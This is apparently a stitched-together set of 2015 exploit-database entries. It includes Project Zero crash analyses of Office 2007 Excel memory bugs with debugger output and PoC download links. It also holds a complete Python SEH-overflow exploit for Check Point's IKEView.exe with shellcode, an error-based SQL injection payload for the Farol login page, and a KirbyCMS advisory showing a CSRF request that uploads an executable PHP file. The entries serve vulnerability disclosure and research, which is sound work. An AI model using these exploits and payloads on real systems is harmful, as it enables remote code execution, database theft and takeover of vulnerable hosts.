Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
eax=00000000 ebx=00000000 ecx=00000000 edx=0012e3bc esi=0ecd8ff0 edi=0000089e
eip=3035a5ed esp=0012e3b0 ebp=0012e410 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
3035a5e4 0f8530270a00 jne Excel!Ordinal40+0x3fcd1a (303fcd1a)
3035a5ea 8b7518 mov esi,dword ptr [ebp+18h]
Excel!Ordinal40+0x35a5ed:
3035a5ed 8b0e mov ecx,dword ptr [esi] ds:0023:0ecd8ff0=????????
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012e410 3035ab4d 00134dc0 0000089e 00000028 Excel!Ordinal40+0x35a5ed
00130464 3035ab9e 00000028 0000000a ffffffff Excel!Ordinal40+0x35ab4d
00131ef0 3026f1cd 00000002 00000000 00000118 Excel!Ordinal40+0x35ab9e
00132514 3026d160 0000000a 00132560 00000118 Excel!Ordinal40+0x26f1cd
0013279c 30263a3d 0e1ecfb8 0000000a 00000000 Excel!Ordinal40+0x26d160
00132c98 302636a5 0e1ecfb8 00000004 00132d20 Excel!Ordinal40+0x263a3d
00132cac 3025869a 00000004 00132d20 00000000 Excel!Ordinal40+0x2636a5
00132d2c 30258553 00134dc0 0000001a 00132d58 Excel!Ordinal40+0x25869a
00132e7c 30258470 30edc060 0e17ac00 0ebb7fac Excel!Ordinal40+0x258553
00132e94 32c50135 30edc060 0e17ac00 00133190 Excel!Ordinal40+0x258470
00132f48 32c4fb6d 00133190 0e83ce38 00000001 mso!Ordinal6768+0x13e7
00132f98 32c4fd30 00133190 00132fec 00000001 mso!Ordinal6768+0xe1f
00132ff8 32c4fb6d 000001be 0e83ce38 00000001 mso!Ordinal6768+0xfe2
00133048 32c4f756 00133190 001330cc 00000000 mso!Ordinal6768+0xe1f
00133108 32c4f0e2 00133190 30eba978 0e74ed90 mso!Ordinal6768+0xa08
0013313c 302583f2 0e74ed90 00133190 0e83ce38 mso!Ordinal6768+0x394
001331c8 302582df 0cc88fd8 00134dc0 00002020 Excel!Ordinal40+0x2583f2
00133f44 301153f9 0cc88fd8 00134b88 00000102 Excel!Ordinal40+0x2582df
We can see that esi is holding a pointer to invalid memory. This is a heap address.
0:000> !heap -p -a 0xecd8ff0
address 0ecd8ff0 found in
_DPH_HEAP_ROOT @ 1161000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
eb04f40: ecd8000 2000
7c83e330 ntdll!RtlFreeHeap+0x0000011a
018b1611 vfbasics!AVrfpRtlFreeHeap+0x000000a8
331039d5 mso!Ordinal1743+0x00002d4d
329c91d1 mso!MsoFreePv+0x0000003f
3025ac56 Excel!Ordinal40+0x0025ac56
3026f1cd Excel!Ordinal40+0x0026f1cd
3026d160 Excel!Ordinal40+0x0026d160
30263a3d Excel!Ordinal40+0x00263a3d
302636a5 Excel!Ordinal40+0x002636a5
3025869a Excel!Ordinal40+0x0025869a
30258553 Excel!Ordinal40+0x00258553
30258470 Excel!Ordinal40+0x00258470
32c50135 mso!Ordinal6768+0x000013e7
32c4fb6d mso!Ordinal6768+0x00000e1f
Esi is a free-ed allocation. This is a use after free vulnerability.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38215.zip
# Exploit Title: IKEView.exe R60 localSEH Exploit
# Date: 17/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/pub/shravan-kumar-ceh-oscp/103/414/450
# Category: Local
#[+] Gr337z: hyp3rlinx for finding the bug
#[+] Source:
#http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt
# exploit as been tested on win XP professional sp2
#Vendor:
#================================
#www.checkpoint.com
#http://pingtool.org/downloads/IKEView.exe
#!/usr/bin/env python
file="IKEView.elg"
x=open(file,"w")
nseh = "\x90\x90\xeb\x32" #short jump
seh = "\xc0\x28\x40\x00" #pop pop ret
nopsled = "\x90"*50
#badchars += "\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
buf = "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
buf += "\x50" #=> PUSH EAX | Push EAX to have null-byte padding for "calc.exe"
buf += "\x68\x2E\x65\x78\x65" #=> PUSH ".exe" | Push The ASCII string to the stack
buf += "\x68\x63\x61\x6C\x63" #=> PUSH "calc" |
buf += "\x8B\xC4" #=> MOV EAX,ESP | Put a pointer to the ASCII string in EAX
buf += "\x6A\x01" #=> PUSH 1 | Push uCmdShow parameter to the stack
buf += "\x50" #=> PUSH EAX | Push the pointer to lpCmdLine to the stack
buf += "\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d | Move the pointer to WinExec() into EBX
buf += "\xFF\xD3" #=> CALL EBX
buf += "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
buf += "\x50" #=> PUSH EAX | Push EAX
buf += "\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2 | Exit process
buf += "\xFF\xD3" #=> CALL EBX
junk = "A"*(4424)
payload = junk + nseh + seh + nopsled + buf
x.write(payload)
x.close()
Source: https://code.google.com/p/google-security-research/issues/detail?id=469
The following crash was observed in Microsoft Office 2007 Excel with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 3013413838_orig.xls
Crashing File: 3013413838_crash.xls
Minimized Crashing File: 3013413838_min.xls
The minimized crashing file shows a one bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file.
File Versions:
Excel.exe: 12.0.6718.5000
OGL.dll: 12.0.6719.5000
oart.dll: 12.0.6683.5002
GDI32.dll: 5.2.3790.5563
Observed Crash:
This crashing eip was observed 4 times in fuzzing results with various invalid memory address being dereferenced.
eax=8a94e1a1 ebx=00000000 ecx=10a80598 edx=8a94e1a0 esi=0013d478 edi=0013d42c
eip=3bd18f75 esp=0013d3dc ebp=0013d3e0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
OGL!ScanOperation::Convert_24_sRGB:
3bd18f68 55 push ebp
3bd18f69 8bec mov ebp,esp
3bd18f6b 837d0800 cmp dword ptr [ebp+8],0
3bd18f6f 7431 je OGL!ScanOperation::Convert_24_sRGB+0x3a (3bd18fa2)
3bd18f71 8d4201 lea eax,[edx+1]
3bd18f74 56 push esi
=> 3bd18f75 0fb65001 movzx edx,byte ptr [eax+1] ds:0023:8a94e1a2=??
0:000> kb L8
ChildEBP RetAddr Args to Child
0013d3e0 3be703b3 0000666f 0013d42c 00000000 OGL!ScanOperation::Convert_24_sRGB+0xd
0013d3fc 3be18f32 00000000 8a94e1a0 0000666f OGL!EpAlphaBlender::Blend+0x55
0013d568 3bd9f6c1 0013d894 00000000 0013d58c OGL!ConvertBitmapData+0x61
0013d5a4 3bde4137 00000000 00000001 000e200b OGL!GpMemoryBitmap::InternalLockBits+0x105
0013d5d0 3bdfa09b 05492fa8 0013d5f8 00000001 OGL!GpMemoryBitmap::LockBits+0xba
0013d608 3bdfac0c 0013d7bc 0013d894 0013d62c OGL!CopyOnWriteBitmap::PipeLockBitsFromMemory+0xb8
0013d6e8 3bd2b7e7 0013d7bc 0013d894 0013d7d0 OGL!CopyOnWriteBitmap::PipeLockBits+0x553
0013d700 3be4cc56 0013d7bc 0013d894 00000001 OGL!GpBitmap::PipeLockBits+0x4e
The function OGL!ScanOperation::Convert_24_sRGB was called with edx pointing to an invalid memory location: 0x8a94e1a0. Tracing back we can find that the heap address where edx came from was allocated with the following call stack:
3be70fe2 OGL!GpMalloc+0x00000014
3bd58669 OGL!CopyOnWriteBitmap::CopyOnWriteBitmap+0x00000049
3be0517e OGL!CopyOnWriteBitmap::Create+0x00000021
3be0514d OGL!GpBitmap::GpBitmap+0x00000030
The edx value was copied in from the stack at the following location OGL!GpMemoryBitmap::InitMemoryBitmap():
3bd4f6f0 8b45fc mov eax,dword ptr [ebp-4]
3bd4f6f3 6a06 push 6
3bd4f6f5 59 pop ecx
3bd4f6f6 8bf3 mov esi,ebx
=>3bd4f6f8 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
The stack location was set with the invalid value here in OGL!ValidateBitmapInfo():
3bda46ed 8b4d08 mov ecx,dword ptr [ebp+8]
3bda46f0 895804 mov dword ptr [eax+4],ebx
3bda46f3 895008 mov dword ptr [eax+8],edx
3bda46f6 89480c mov dword ptr [eax+0Ch],ecx
=> 3bda46f9 897810 mov dword ptr [eax+10h],edi
Edi is set earlier as the result of an imul instruction that is then added to a base heap pointer:
.text:3BDA46CB lea edi, [ebx-1]
.text:3BDA46CE imul edi, edx
.text:3BDA46D1 add edi, [ebp+arg_4] ; bad value here
With this PoC edi=0x0000666e and edx=0x00013350. The edx value is calculated earlier in the same function. If 0xf9ef540 is the base pointer (arg_4) we end up setting this value to be 0x666e*0x13350+0xf9ef540 or 0x8a94e1a0 as we saw in the initial bad memory access. The heap chunk referenced at 0xf9ef540 has an original allocation size of 15156 and we've set our pointer far out of bounds of this allocation range.
There is a distinct lack of overflow checks and bounds checking in the OGL!ValidateBitmapInfo function that may lead to memory corruption when doing bitmap conversion later on in the code. For example, if the 0x13350 value is able to grow to 0x27fd0 we can set the edi value to be 0xffffcb60 (0x666e * 0x27fd0 = 0xffffcb60) which leads to an out of bound write instead of an out of bound read later in the code.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38217.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=465
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 1516065514_orig.xls
Crashing File: 1516065514_crash.xls
Minimized Crashing File: 1516065514_min.xls
The minimized crashing file shows a one bit deltas from the original file at offset 0x49E8. OffVis reports this to be the CreateTime field of an OLESSDirectoryEntry structure.
File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
When run without Application Verifier enabled the following crash occurs:
eax=30272d58 ebx=03b49330 ecx=03b49144 edx=03a64d44 esi=30f6dca0 edi=03a64d40
eip=fffffffc esp=00133e80 ebp=00133e84 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
fffffffc ?? ???
0:000> kb L8
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
00133e7c 3028f4da 00133ec8 3028d2ef 00000005 0xfffffffc
00133e84 3028d2ef 00000005 00000001 03b49200 Excel!Ordinal40+0x28f4da
00133ec8 30290e14 03b49330 00000001 00000000 Excel!Ordinal40+0x28d2ef
00133fa0 3028a2b9 00000000 00000000 00000000 Excel!Ordinal40+0x290e14
00134130 302912ae 00000000 00000000 00000000 Excel!Ordinal40+0x28a2b9
0013414c 30286206 00000001 00000000 03b66c00 Excel!Ordinal40+0x2912ae
001341cc 302860ce 00000000 ffffffff 00000001 Excel!Ordinal40+0x286206
0013426c 30282360 03b49000 027c6a00 d107955b Excel!Ordinal40+0x2860ce
In this crash case eip was corrupted to 0xfffffffc. Tracing through sub_3028F4B4 we see something along the lines of:
x = *dword_30F5F9BC + 0x144; // x=0x30272d58
fptr = x + x[0x14]; // x[0x14] == 0
fptr(); // calling pointer at 0x30272d58 = 0xfffffffc
It looks as though the global variable at 30f5f9bc was used with incorrect type information or otherwise corrupted. Running the same poc file again but with Application Verifier enabled gets us closer to the root of the issue with the following crash observed:
eax=0ff28e50 ebx=07b42420 ecx=0012c91c edx=00000020 esi=0364efe8 edi=00000000
eip=30299c9e esp=0012c944 ebp=0012c950 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Excel.exe -
Excel!Ordinal40+0x299c9e:
30299c9e 8b80f0030000 mov eax,dword ptr [eax+3F0h] ds:0023:0ff29240=????????
0:000> kb L8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012c950 3006b70a 00000005 00000001 07b42420 Excel!Ordinal40+0x299c9e
0012cc84 3006b556 0012ceb4 0020020a 07b42420 Excel!Ordinal40+0x6b70a
0012ce8c 3006b3a2 0012ceb4 0ee46ff0 00000009 Excel!Ordinal40+0x6b556
00133050 3006a11c 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x6b3a2
00133ca0 3006a01b 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x6a11c
00133d50 30069ead 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x6a01b
00133d70 302972c0 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x69ead
00133e28 302974c7 0f82ef58 00133ec0 00133eac Excel!Ordinal40+0x2972c0
We can see here that eax is being indexed at an offset of 0x3f0. However, if we look at the actual allocation for the chunk eax is pointed to we see that the allocation size was only 0x1b0.
0:000> !heap -p -a 0xff28e50
address 0ff28e50 found in
_DPH_HEAP_ROOT @ 1161000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
f7b5400: ff28e50 1b0 - ff28000 2000
7c83d6d4 ntdll!RtlAllocateHeap+0x00000e9f
018b1504 vfbasics!AVrfpRtlAllocateHeap+0x000000c3
33103a8f mso!Ordinal1743+0x00002e07
329c7e66 mso!MsoPvAllocCore+0x0000005a
3000b694 Excel!Ordinal40+0x0000b694
3000b640 Excel!Ordinal40+0x0000b640
This poc behaves like a type confusion or memory corruption issue in areas not protected by application verifier. The fact the eip was corrupted indicates a high likelihood for exploitation.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38216.zip
# Exploit Title: Web Application Farol with anauthenticated SQLi injection
# Date: 2015-09-16
# Exploit Author: Thierry Fernandes Faria [ a.k.a SoiL ] [ thierryfariaa (at) gmail (dot) com ]
# Vendor Homepage:http://www.teiko.com.br/pt/solucoes/infraestrutura-em-ti/farol
# Version: [All]
# CVE : CVE-2015-6962
# OWASP Top10: A1-Injection
+---------------------+
+ Product Description +
+---------------------+
The FAROL web application is a software that monitors the databases
+----------------------+
+ Exploitation Details +
+----------------------+
A vulnerability has been detected in the login page from web application FAROL . Sql injection anauthenticated.
The e-mail field at login page is vulnerable.
The e-mail field is vulnerable to Error Based Sql injection.
Vulnerable Page: http://target/tkmonitor/estrutura/login/Login.actions.php?recuperar
Vulnerable POST Parameter: email
Usage:email'[SQLi error based]--
eg:
email=1'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--
ORA-20000: Oracle Text error:
DRG-11701: thesaurus CORE 11.2.0.4.0 ProductionNLSRTL Version 11.2.0.4.0 - ProductionOracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit ProductionPL/SQL Release 11.2.0.4.0 - ProductionTNS for Linux: Version 11.2.0.4.0 - Production does not exist
ORA-06512: at "CTXSYS.DRUE", line 160
+----------+
+ Solution +
+----------+
Upgrade the software
=============================================
- Release date: 14.09.2015
- Discovered by: Dawid Golunski
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Kirby CMS <= 2.1.0 CSRF Content Upload and PHP Script Execution
II. BACKGROUND
-------------------------
- Kirby CMS
"Kirby is a file‑based CMS
Easy to setup. Easy to use. Flexible as hell."
http://getkirby.com/
III. INTRODUCTION
-------------------------
KirbyCMS has a vulnerability that allows to upload normally disallowed PHP
script files.
This issue can only be exploited by authenticated users, however admin role
is not required.
Additionally, KirbyCMS has another vulnerability - Cross-Site Request Forgery
(CSRF) - which may allow attackers to perform file upload actions on behalf
of an already authenticated KirbyCMS users, if an attacker manages to trick
them into visiting a specially-crafted website.
This issue can allow an unauthorised attacker to modify or upload new content.
Both of the issues can be combined to execute arbitrary PHP code on the
remote server hosting KirbyCMS, if a logged-in victim visits a malicious page
containing an exploit crafted by an attacker.
IV. PHP Code Execution
-------------------------
KirbyCMS allows to upload content to both admin and a low privileged editor
users who can access the control panel.
The upload feature allows to upload images and other media files which can
be referenced within the content once uploaded.
KirbyCMS performs the following validation before saving an uploaded file
to prohibit risky uploads:
---[ panel/app/controllers/api/files.php ]---
protected function checkUpload($file, $blueprint) {
if(strtolower($file->extension()) == kirby()->option('content.file.extension', 'txt')) {
throw new Exception('Content files cannot be uploaded');
} else if(strtolower($file->extension()) == 'php' or
in_array($file->mime(), f::$mimes['php'])) {
throw new Exception('PHP files cannot be uploaded');
} else if(strtolower($file->extension()) == 'html' or
$file->mime() == 'text/html') {
throw new Exception('HTML files cannot be uploaded');
...
}
---------------------------------------------
As we can see it prevents uploading PHP files by checking if an uploaded file
has a '.php' extension, or if the discovered MIME type of the file has been
evaluated to PHP. KirbyCMS throws an exception and stops further processing
if either of the conditions is true.
Unfortunately, both of the checks can easily be bypassed on multiple server
configurations.
As many server configurations such as Ubuntu, or Debian, process several
file extensions as PHP scripts, e.g.: .php, .php4, .php5.
The extension check can for example be evaded by simply uploading a malicious
file with the '.php4' extension.
The MIME type check can also be easily bypassed by preceding the <?php script
tags with <?xml tags , to trick the MIME detector into recognising
the malicious file as XML thus passing the check (mime['php'] != mime['xml']).
As the upload directory is not set to disable script execution by default,
bypassing the checks allows to upload arbitrary PHP scripts and execute them
on the remote server hosting a vulnerable KirbyCMS installation.
V. CSRF
-------------------------
Media files are only meant to be uploaded by authenticated users such
as editors or site administrators.
However, KirbyCMS's upload function does not protect against
cross-site request forgery by including a special CSRF token to verify
the source of the request.
As a result, an attacker can prepare a specially-crafted webpage which will
upload a malicious file to the remote KirbyCMS site without user's permission,
if the attacker manages to trick the logged-in victim into visiting his page.
VI. PROOF OF CONCEPT
-------------------------
Both of the issues described above can be combined to prepare a malicious page
which uploads an arbitrary PHP file as soon as a victim authenticated
into KirbyCMS visits the page.
An malicious CSRF html page could send a request similar to the following:
POST /kirby/panel/api/files/upload/about HTTP/1.1
Host: victim_kirby_server
Content-Type: multipart/form-data; boundary=---------------------------4679830631250006491995140822
Content-Length: 261
Origin: null
Cookie: PHPSESSID=tjnqqia89ka0q7khl4v72r6nl1; kirby=323b04a2a3e7f00...
-----------------------------4679830631250006491995140822
Content-Disposition: form-data; name="file"; filename="kirbyexec.php5"
Content-Type: application/x-php
<?xml >
<?php
phpinfo();
?>
-----------------------------4679830631250006491995140822--
uploading the file as a result into the: kirby/content/1-about
directory on the server.
The malicious file can then be accessed via the URL:
http://victim_kirby_server/kirby/content/1-about/kirbyexec.php5
Once opened, phpinfo() page should be loaded.
VII. BUSINESS IMPACT
-------------------------
By combining the two issues an attacker could execute arbitrary PHP code
on the remote server without any authentication to gain full control over
the website using a vulnerable KirbyCMS.
VIII. SYSTEMS AFFECTED
-------------------------
The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable.
To exploit the PHP script execution vulnerability the webserver must be
configured to process files as PHP with extensions other than .php.
Ubuntu and Debian systems fulfill this condition. There might be more systems
which are configured in this way by default, or have been reconfigured to
do so.
To gain access to the control panel and upload a malicious PHP file, an
attacker may be able to exploit a separate, Authentication Bypass issue also
discovered by Dawid Golunski, described in a separate document.
IX. SOLUTION
-------------------------
Upgrade to the patched version 2.1.1 released by the vendor upon this advisory.
X. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/KirbyCMS-CSRF-PHP-File-Upload-Vulnerability.txt
http://getkirby.com/
http://seclists.org/fulldisclosure/2015/Sep/index.html
http://www.securiteam.com/
XI. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XII. REVISION HISTORY
-------------------------
14.09.2015 - Final
XIII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.